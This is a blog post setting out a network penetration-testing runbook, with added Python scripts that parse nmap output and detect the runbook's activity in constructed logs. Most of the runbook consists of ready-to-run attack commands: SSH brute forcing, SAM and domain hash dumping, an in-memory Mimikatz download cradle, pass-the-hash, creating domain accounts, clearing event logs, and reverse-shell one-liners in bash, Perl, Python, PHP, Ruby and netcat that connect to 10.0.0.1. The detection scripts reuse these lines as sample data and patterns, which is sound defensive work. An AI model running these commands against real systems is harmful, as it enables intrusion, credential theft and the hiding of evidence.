Friday, 01 September 2017

Runbook (Network Pentesting)

This is a rough copy of a runbook I am building for penetration testing. Still in progress. Suggestions? Please contact me.

Recon


nmap -sS -O -p1-65535 --script banner 192.168.1.1/24
Scan all ports and detect OS + banner grab
nmap -sT -sU -sV -O -p1-65535 --script banner 192.168.1.1/24
TCP (full connect scan) + UDP scan + service version + OS detection + banner of all ports (slow)
nmap -sn -n -T4 192.168.1.1/24
Ping scan with no DNS resolution
nmap -Pn -sS -T4 -sV -O --reason -oA filename 192.168.1.1/24
Port scan all hosts + OS Detection + service version + Output to all formats + port response info
FOR /L %x in (1,1,255) do ping -n 1 192.168.2.%x | find /I "reply" >> c:\temp\pingresult.txt
Ping scan from Windows command line
1..255 | foreach-object { (new-object System.Net.Networkinformation.Ping).Send("192.168.2.$_") } | where-object {$_.Status -eq "success"} | select Address
Ping scan with Windows Powershell
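The `-oA` scan above writes three files, one of them in Nmap's grepable (`.gnmap`) format. The parser below turns that file into a per-host inventory and inverts it by service, so the exposure of a subnet (every host answering on SMB, every SSH banner) can be reviewed or diffed against an asset list. This is an added example, not code from the original runbook; the `SAMPLE_GNMAP` text is constructed by hand to match the grepable format and is not real scan output.

```python
"""Parse Nmap grepable output (.gnmap) into a host/port inventory.
Added example; the sample text below is constructed, not a real scan."""
import re
from collections import defaultdict

# Constructed sample: what 'nmap -Pn -sS -T4 -sV -O --reason -oA filename' writes
# to filename.gnmap. Fields on a Host: line are separated by tabs; each port
# entry has seven slash-separated fields (nmap rewrites '/' inside a field
# as '|' so the split stays safe).
SAMPLE_GNMAP = """\
# Nmap 7.70 scan initiated Fri Sep  1 10:00:00 2017 as: nmap -Pn -sS -T4 -sV -O --reason -oA filename 192.168.1.1/24
Host: 192.168.1.10 ()\tStatus: Up
Host: 192.168.1.10 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4 (protocol 2.0)/, 80/open/tcp//http//Apache httpd 2.4.6/, 445/filtered/tcp//microsoft-ds///\tIgnored State: closed (997)
Host: 192.168.1.20 (dc01.corp.local)\tStatus: Up
Host: 192.168.1.20 (dc01.corp.local)\tPorts: 88/open/tcp//kerberos-sec//Microsoft Windows Kerberos/, 389/open/tcp//ldap//Microsoft Windows Active Directory LDAP/, 445/open/tcp//microsoft-ds//Microsoft Windows Server 2008 R2 microsoft-ds/\tOS: Microsoft Windows Server 2008 R2\tSeq Index: 258
# Nmap done at Fri Sep  1 10:05:00 2017 -- 256 IP addresses (2 hosts up) scanned in 300.12 seconds
"""

HOST_RE = re.compile(r"^Host: (\S+) \(([^)]*)\)\t(.*)$")


def parse_gnmap(text):
    """Return {ip: {"hostname", "ports": [...], "os"}} from grepable output."""
    hosts = {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue  # comment lines and anything not starting with 'Host:'
        ip, name, rest = m.groups()
        entry = hosts.setdefault(ip, {"hostname": name, "ports": [], "os": None})
        for field in rest.split("\t"):
            key, _, value = field.partition(": ")
            if key == "Ports":
                for item in value.split(", "):
                    port, state, proto, _owner, service, _rpc, version = item.split("/")[:7]
                    entry["ports"].append({
                        "port": int(port), "state": state, "proto": proto,
                        "service": service, "version": version,
                    })
            elif key == "OS":
                entry["os"] = value
    return hosts


def open_ports_by_service(hosts):
    """Invert the inventory: service name -> [(ip, port)] for open ports only."""
    index = defaultdict(list)
    for ip, host in hosts.items():
        for p in host["ports"]:
            if p["state"] == "open":
                index[p["service"]].append((ip, p["port"]))
    return dict(index)


if __name__ == "__main__":
    inventory = parse_gnmap(SAMPLE_GNMAP)
    for ip, host in inventory.items():
        print(ip, host["hostname"] or "-", host["os"] or "")
        for p in host["ports"]:
            print(f"  {p['port']}/{p['proto']} {p['state']:<9} {p['service']:<14} {p['version']}")
    print(open_ports_by_service(inventory))
```

Only `open` ports go into the service index; filtered ports are kept in the per-host record because a change from filtered to open between two scans is often the finding worth chasing.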

Brute Force


ncrack -u user -P password_list.txt -p ssh 192.168.1.1
Run SSH brute force

Enumeration


enum4linux - Portcullis Labs
Plundering Windows Account Info via Authenticated SMB Sessions - Sans Penetration Testing

SQL


Hunting MySQL - Metasploit Unleashed
Admin-mssql-auxiliary-modules - Metasploit Unleashed
Attacking mssql with Metasploit - Darkoperator
Attacking MySQL with Metasploit - Pentestlab

Capture


Responder 2.0 - Owning Windows Networks part 2 - SpiderLabs
Responder 2.0 - Owning Windows Networks part 3 - SpiderLabs

Vulnerability Analysis


nmap --script smb-check-vulns.nse --script-args=unsafe=1 -p445 192.168.1.1/24
Check for MS08-067 and other SMB vulns. unsafe=1 enables the checks that can crash the target service, so do not run it against production hosts without agreement. In current Nmap releases this script has been split into the individual smb-vuln-* scripts (e.g. smb-vuln-ms08-067)

Privilege escalation


meterpreter> getuid
Display the user that the Meterpreter server is running as on the host
whoami
Windows or Linux check current user
whoami /groups
Windows – to check integrity level and permissions
id
Linux – check permissions of current user
meterpreter> run post/windows/gather/win_privs
This module prints whether UAC is enabled and whether the current account is admin-enabled. It also prints the UID, foreground session ID, whether the process is SYSTEM, and the current process privileges
meterpreter> getsystem
Attempt to get system privs on system

Dumping hashes


Windows
meterpreter> run post/windows/gather/hashdump
Dump the local user accounts from the SAM database using the registry
powershell "IEX (New-Object Net.WebClient).DownloadString('http://<invoke-mimikatz>'); Invoke-Mimikatz -DumpCreds"
Run Invoke-Mimikatz in memory with a PowerShell download cradle. Additional arguments can be appended to the end of the command
meterpreter> run post/windows/gather/credentials/domain_hashdump
Dump hashes from a domain controller safely

Windows


Windows Privilege Escalation Fundamentals - FuzzySecurity
UAC what penetration testers should know - Cobalt Strike blog
windows-privesc-check - PentestMonkeys
Veil-Powerup usage guide - Harmj0y
Windows Exploit Suggester - GDSSecurity
Metasploit local exploit suggester - Metasploit
pinjector - Tarasco

Linux


Unix & Linux password cracking - Nixcraft
Basic Linux Privilege Escalation - g0tmi1k
Unix-privesc-check - Pentestmonkeys
LinEnum - rebootuser
Linuxprivchecker - rebootuser
Exploiting SUID executables - Pentestpartners

Post Exploitation


post/windows/recon/computer_browser_discovery - Uses Railgun to discover hostnames and IPs on the network
post/windows/gather/arp_scanner - Scan the local subnet without pinging boxes
post/windows/gather/cachedump - Dump cached domain creds
post/windows/gather/checkvm - Check if the host is a VM
post/windows/gather/credentials/gpp - Pulls passwords out of Group Policy Preferences
post/windows/gather/credentials/tortoisesvn - Pulls saved creds from TortoiseSVN, which Windows admins use for SVN
post/windows/gather/credentials/winscp - Pulls saved passwords from WinSCP (secure copy client)
post/windows/gather/dnscache_dump - Dump the DNS cache to see which sites users have visited
post/windows/gather/enum_applications - Finds applications installed on the computer
post/windows/gather/enum_chrome / enum_ie / enum_firefox - Enumerate saved browser data (Chrome, IE, Firefox)
post/windows/gather/enum_termserv - Shows which hosts this box has RDP connections to
post/windows/gather/enum_unattend - Unattended install files; these contain creds
post/windows/manage/inject_ca - Injects a cert authority into the box
post/windows/manage/remove_ca - Deletes a cert authority to remove restrictions
post/windows/wlan/wlan_profile - Dumps wifi passwords in clear text for Win7 and above
post/windows/gather/enum_tokens - This module will identify systems that have a Domain Admin (delegation) token on them
A portion of the above list is from the Metasploit Minute Video here

Active Directory


post/windows/gather/enum_ad_computers - Find computers on the domain; very stealthy
post/windows/gather/enum_ad_service_principal_names - Find SQL servers and other hosts running registered services
post/windows/gather/enum_ad_user_comments - User comments; for some accounts these contain passwords

net view /domain
List domain association
net view /domain:(domain)
List hosts on domain. Same as network neighborhood
net group "Domain Computers" /domain
List all domain computers
net view \\(computername)
List shares on a computer
net user /domain
List all users in domain
net group /domain
List all groups in domain
net group "group name" /domain
List users in a group on the domain
net user "user" /domain
List information about a domain user including group membership
nltest /dclist:(domain)
List all domain controllers on domain
nltest /domain_trust
Map domain trust
net localgroup administrators /domain
List all domain controller administrators (members of the DC's local Administrators group)
net user username password /ADD
Add local user account
net user username password /ADD /DOMAIN
Add new user account to domain
wmic useraccount
List all local accounts with SID
Get-ADUser -Filter * -Properties Description | Select-Object SamAccountName, Description
Get descriptions from AD to look for passwords stored in the account description field. Can be done from any domain user

Running DLL

rundll32.exe dllname.dll,StartW

File exploring

dir /S /B
Dirwalk Windows

Passing shells

meterpreter> run post/windows/manage/payload_inject
Create a new shell on a box you already own (two is one and one is none). Can also be used to send a session to another user

Lateral Movement


dir \\host\c$
Check whether you are an admin on another computer by listing its c$ share
runas /user:Domain\(user) something.exe
Create a token with creds from command line
runas /user:Domain\(user) /netonly something.exe
Create a token to pass creds
sekurlsa::pth /user:USERNAME /domain:DOMAIN /ntlm:HASH /run:COMMAND
Pass the hash with Mimikatz
SCHTASKS /Run /S system /U user /P password /I /TN "taskname"
Run task immediately on remote system
wmic /node:(host) process call create (path to exe)
Run exe on remote computer with WMIC
Powershell Invoke-Command -ComputerName (host) -ScriptBlock { dir c:\ }
Run a command with Windows Remoting (WinRM, port 5985). WinRM is turned off by default and turned on where remote administration is used

Cleaning up


meterpreter> clearev
Clears the Application, System and Security logs on a Windows system. There are no options or arguments
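Seen from the blue team side, the commands in the Active Directory, Lateral Movement and Cleaning up sections above leave a recognisable trail in process-creation auditing and in the log-cleared event. The script below is an added example, not part of the original runbook: it runs a handful of command-line rules over constructed events modelled on Windows Security log entries (event 4688 process creation with command-line auditing enabled, and event 1102 "audit log was cleared", which is what `clearev` on the Security log produces). The rule names, the host and user names, and the event records are all my own constructions.

```python
"""Detection rules for discovery, lateral-movement and log-clearing activity.
Added example; SAMPLE_EVENTS are hand-written stand-ins for Windows Security
log records (4688 with command line, 1102 audit log cleared), not real data."""
import re
from dataclasses import dataclass

# (rule name, regex over the 4688 process command line); names are my own
RULES = [
    ("ad_discovery_net", re.compile(r"\bnet\s+(view|user|group|localgroup)\b.*\s/domain\b", re.I)),
    ("ad_discovery_nltest", re.compile(r"\bnltest\b.*/(dclist|domain_trust)", re.I)),
    ("local_admin_share_check", re.compile(r"\bdir\s+\\\\[^\\]+\\c\$", re.I)),
    ("remote_exec_wmic", re.compile(r"\bwmic\b.*/node:.*process\s+call\s+create", re.I)),
    ("remote_exec_schtasks", re.compile(r"\bschtasks\b.*/run\b.*/s\s+\S+", re.I)),
    ("remote_exec_winrm", re.compile(r"invoke-command\b.*-computername", re.I)),
    ("runas_netonly", re.compile(r"\brunas\b.*/netonly", re.I)),
    ("download_cradle", re.compile(r"downloadstring\(|\bIEX\b", re.I)),
]


@dataclass
class Event:
    event_id: int
    host: str
    user: str
    command_line: str = ""  # populated for 4688 only


def classify(event):
    """Return the rule names that fire on one event (empty list if none)."""
    hits = []
    if event.event_id == 1102:
        hits.append("audit_log_cleared")
    elif event.event_id == 4688:
        for name, rx in RULES:
            if rx.search(event.command_line):
                hits.append(name)
    return hits


def triage(events):
    """Group hits per host, so discovery followed by remote execution and a
    cleared log on the target reads as one chain rather than isolated alerts."""
    per_host = {}
    for ev in events:
        for hit in classify(ev):
            per_host.setdefault(ev.host, []).append((ev.user, hit))
    return per_host


# Constructed sample events: one workstation enumerating the domain and
# launching a process on a file server, then the file server's log is cleared.
SAMPLE_EVENTS = [
    Event(4688, "WS01", "CORP\\jdoe", "net view /domain:CORP"),
    Event(4688, "WS01", "CORP\\jdoe", 'net group "Domain Admins" /domain'),
    Event(4688, "WS01", "CORP\\jdoe", "nltest /dclist:CORP"),
    Event(4688, "WS01", "CORP\\jdoe", "dir \\\\FS01\\c$"),
    Event(4688, "WS01", "CORP\\jdoe", 'wmic /node:FS01 process call create "C:\\Users\\Public\\svc.exe"'),
    Event(4688, "WS01", "CORP\\jdoe", "notepad.exe C:\\Users\\jdoe\\notes.txt"),  # benign
    Event(1102, "FS01", "CORP\\jdoe"),
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host)
        for user, rule in hits:
            print(f"  {user:<14} {rule}")
```

Individually, `net view /domain` or `nltest /dclist` is routine admin activity; the value is in the grouping. A non-admin workstation that emits several discovery rules, then a remote-execution rule against a host whose Security log is cleared minutes later, is worth a ticket even though no single rule is high-fidelity on its own.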

Reverse Shells


Bash

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Python Pseudo terminal

python -c "import pty;pty.spawn('/bin/bash')"
Use this on raw shells

PHP

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat Linux

nc -e /bin/sh 10.0.0.1 1234

Netcat Windows

nc 10.10.0.1 1234 -e cmd.exe
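The one-liners in this section share a few traits a defender can key on: a `/dev/tcp/` redirect, netcat with `-e`, or an interpreter invoked with an inline script that opens a socket and then hands it to `/bin/sh`. The script below is an added example, not part of the original runbook: it applies those patterns to constructed Linux process-execution records (fields loosely modelled on an auditd EXECVE event) and adds a context rule for a shell spawned by a service process, which is the usual shape of a web shell turning into a reverse shell. Rule names, user names and the records themselves are my own constructions.

```python
"""Detection rules for the reverse-shell one-liners in this section.
Added example; SAMPLE_RECORDS are hand-written, not captured from a host."""
import os
import re

# (rule name, regex over the full command line); names are my own
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("netcat_exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("interp_socket_shell", re.compile(
        r"\b(python\d?|perl|php|ruby)\b.*(socket|fsockopen|TCPSocket)\b.*(/bin/sh|/bin/bash|exec)")),
    ("pty_upgrade", re.compile(r"pty\.spawn\(")),
]

# Service accounts' parent processes that have no business spawning a shell
SERVICE_PARENTS = {"apache2", "httpd", "nginx", "php-fpm", "tomcat", "java", "mysqld", "postgres"}
SHELL_NAMES = {"sh", "bash", "dash"}


def classify(rec):
    """Return rule names that fire on one record: pattern rules first,
    then the context rule (service process directly spawning a shell)."""
    hits = [name for name, rx in RULES if rx.search(rec["cmdline"])]
    first = rec["cmdline"].split(None, 1)[0]
    if rec["parent_comm"] in SERVICE_PARENTS and os.path.basename(first) in SHELL_NAMES:
        hits.append("service_spawned_shell")
    return hits


def scan(records):
    """Return only the records that fired at least one rule, with their hits."""
    out = []
    for rec in records:
        hits = classify(rec)
        if hits:
            out.append({**rec, "hits": hits})
    return out


# Constructed sample records (uid, parent process name, full command line)
SAMPLE_RECORDS = [
    {"user": "www-data", "parent_comm": "php-fpm",
     "cmdline": "/bin/sh -c bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"},
    {"user": "www-data", "parent_comm": "apache2",
     "cmdline": "python -c 'import socket,subprocess,os;s=socket.socket();"
                "s.connect((\"10.0.0.1\",1234));os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])'"},
    {"user": "tomcat", "parent_comm": "java",
     "cmdline": "nc -e /bin/sh 10.0.0.1 1234"},
    {"user": "alice", "parent_comm": "sshd",
     "cmdline": "python -c \"import pty;pty.spawn('/bin/bash')\""},
    # benign: port check by an admin, and an app worker using a unix socket
    {"user": "alice", "parent_comm": "bash",
     "cmdline": "nc -zv 10.0.0.5 443"},
    {"user": "app", "parent_comm": "systemd",
     "cmdline": "python3 /opt/app/worker.py --socket /run/app.sock"},
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_RECORDS):
        print(f"{rec['user']:<9} parent={rec['parent_comm']:<8} {rec['hits']}")
```

The `pty_upgrade` rule on its own is weak (interactive users run Python too); it earns its place when it fires a few seconds after one of the socket rules on the same host, because upgrading a raw shell with `pty.spawn` is the next step in this runbook. The context rule is the one that survives obfuscation of the command line: however the payload is encoded, `php-fpm` still ends up as the parent of `/bin/sh`.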

References

Reverse shell cheat sheet - Pentestmonkeys
Netcat cheat sheet v1 - Sans Penetration Testing
